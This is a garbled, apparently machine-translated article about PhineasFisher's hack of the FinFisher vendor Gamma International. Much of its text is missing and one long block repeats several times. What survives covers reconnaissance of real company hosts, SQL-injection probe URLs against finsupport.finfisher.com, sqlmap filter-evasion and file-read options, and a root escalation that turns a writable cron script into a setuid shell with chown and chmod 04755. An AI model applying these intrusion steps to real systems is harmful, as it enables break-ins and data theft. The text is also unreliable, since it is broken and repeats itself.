How Gamma International was hacked

On August 3, in the subreddite / r / Anarchism, a certain user of PhineasFisher created a thread in which he reported that he managed to steal 40 gigabytes of various data from Gamma International . Perhaps such a story could not be so loud if it were not for the business in which this European company is engaged - the creation and sale of software for hacking and hidden surveillance (and in other words, the real Malvari), whose customers were usually government agencies. A few days after the first message, the hacker posted a long story about how he managed to penetrate the Gamma International server and what was found there.


')

Read more about FinFisher

At the beginning there is a small digression and a story about what hacker interested Gamma International . In addition, this company distributes a set of FinFisher software, which is described as "a software solution for intrusion and remote monitoring, designed for use by government agencies ." Several states of the predominantly Middle East were found to be in negotiations or using this espionage system, but these facts did not receive much publicity and investigation.

First, malware got to computers through a hole in iTunes (any third-party program could use the auto-update of this media center with all the available operations and the ensuing consequences), which Apple has not closed for more than three years.

In 2012, many opposition activists in Bahrain received an email with attachments - .rar archives with photographs or other documents, under the guise of which a multifunctional Trojan penetrated their machines. It is noteworthy that the file names, for example, exe.Image.jpg at first glance seemed to be “correct”, but in localized systems for Arab countries, they, as expected, turned over from right to left and the file for the system turned out to be not an image, but an executable gpj.egamI.exe . The study of this attack took the guys from CitizenLab , and that's what they found out .



Troyan copied to folder C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

• C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
• C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
• C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
• C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
• C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

